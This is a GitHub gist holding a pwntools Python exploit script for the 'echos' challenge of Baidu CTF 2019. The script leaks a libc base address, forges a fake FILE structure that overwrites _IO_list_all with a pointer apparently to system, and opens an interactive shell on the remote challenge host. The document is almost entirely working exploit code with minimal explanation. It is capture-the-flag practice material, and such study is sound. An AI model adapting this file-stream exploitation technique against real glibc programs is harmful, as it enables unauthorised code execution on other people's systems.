Skip to content

Instantly share code, notes, and snippets.

@hama7230
Created June 2, 2019 18:54
Show Gist options
  • Save hama7230/eea6f5db0451692be14e4ac43ebb7639 to your computer and use it in GitHub Desktop.
Save hama7230/eea6f5db0451692be14e4ac43ebb7639 to your computer and use it in GitHub Desktop.
Baidu CTF 2019 echos
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# libc = ELF('')
elf = ELF('./echos')
context(os='linux', arch=elf.arch)
#context(log_level='debug') # output verbose log
RHOST = "echos.r3kapig.com"
RPORT = 9999
LHOST = "127.0.0.1"
LPORT = 9999
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./echos'], gdbscript=gdbscript)
else:
conn = process(['./echos'])
# conn = process(['./echos'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
def send(size, payload, wait=True):
conn.send(str(size).ljust(0x1f, '\x00'))
time.sleep(0.01)
conn.send(payload)
if wait:
conn.recvuntil('\n')
# exploit
log.info('Pwning')
send(0x18, 'x'*0x18)
send(0x28, 'x'*0x28)
send(0x38, 'x'*0x38)
send(0x48, 'x'*0x48)
send(0x58, 'x'*0x58)
send(0x420, '\x00', False)
buf = conn.recv(8)
libc_base = u64(buf) - 0x3c4b00
dbg('libc_base')
conn.recvuntil('\n')
fake_stderr = (libc_base + 0x3c5540) & 0xffffff00ffff
print hex(fake_stderr)
if libc_base < fake_stderr:
print 'unexploitable'
import sys
sys.exit(0)
diff = libc_base - (fake_stderr&0xfffffffff000)
dbg('diff')
send(diff - 0x22000-0x1000, 'fuga')
payload = 'x'*0x520
fake_file = ''
fake_file += p64(0)*4 # 0
fake_file += p64(0) + p64(0)
fake_file += p64(0) + p64(0x7fffffffffffffff)
fake_file += p64(0)*2
fake_file += p64((libc_base + 0x11e70 - 100)/2) + p64(0) * (0xb) #
fake_file += p64(libc_base + 0x3c5590) # dokodemo
fake_file += p64(0) *3
fake_file += p64(0)
fake_file += p64(0) * 2
fake_file += p64(libc_base + 0x3c37a0)
fake_file += p64(libc_base + 0x45390)
for i in range(0x20):
print i,
send(0x21000, payload+fake_file)
_IO_list_all = libc_base + 0x3c5520
send(_IO_list_all+3, '', False)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment